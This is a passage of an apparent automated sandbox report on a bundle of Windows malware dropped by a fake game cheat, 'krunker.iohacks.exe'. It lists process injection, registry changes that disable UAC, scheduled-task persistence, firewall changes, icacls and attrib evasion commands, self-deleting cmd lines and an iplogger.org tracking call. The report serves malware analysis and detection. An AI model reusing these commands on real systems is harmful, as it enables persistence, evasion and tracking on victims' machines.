Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\7.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2964 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2964 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2964 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2964 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2860 wrote to memory of 300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2860 wrote to memory of 300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2860 wrote to memory of 300 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2860 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2860 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2860 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2860 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2860 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 2092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2860 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2860 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2860 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2860 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 1788 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1788 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1788 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1788 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 1684 wrote to memory of 1852 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 1852 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 1852 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 1852 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2860 wrote to memory of 340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 616 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 616 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 616 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 616 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 616 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 616 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 616 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 616 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 340 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
PID 1852 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1852 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

"4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

"bot.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp" /SL5="$3019C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9888.tmp\9889.tmp\988A.bat C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

"ska2pwej.aeh.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2bB2s6

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"

C:\Users\Admin\Desktop\1.exe

"C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

"RIP_YOUR_PC_LOL.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Users\Admin\Desktop\10.exe

"C:\Users\Admin\Desktop\10.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

"x2s443bc.cs1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c 107481704838965.bat

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1548 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp" /SL5="$4017A,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WTFUXJ8_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WHOILPL_.txt

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\93A8.tmp\spwak.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im E

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\980B.tmp\splitterrypted.vbs

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\980B.tmp\splitterrypted.vbs

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe

"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Windows\SysWOW64\wscript.exe

C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\93A8.tmp\spwak.vbs

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:472069 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Users\Admin\Desktop\5.exe

"C:\Users\Admin\Desktop\5.exe"

C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp" /SL5="$60170,4511781,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe"

C:\Users\Admin\Desktop\6.exe

"C:\Users\Admin\Desktop\6.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

C:\Users\Admin\Desktop\7.exe

"C:\Users\Admin\Desktop\7.exe"

C:\Users\Admin\Desktop\8.exe

"C:\Users\Admin\Desktop\8.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm"

C:\PROGRA~3\system.exe

C:\PROGRA~3\system.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7668.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0xc4

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "system" /sc ONLOGON /tr "'C:\ProgramData\freebl3\system.exe'" /rl HIGHEST /f

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "6" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\6.exe'" /rl HIGHEST /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c timeout /t 5 & del /f /q C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe & del "C:\ProgramData\*.dll"" & exit
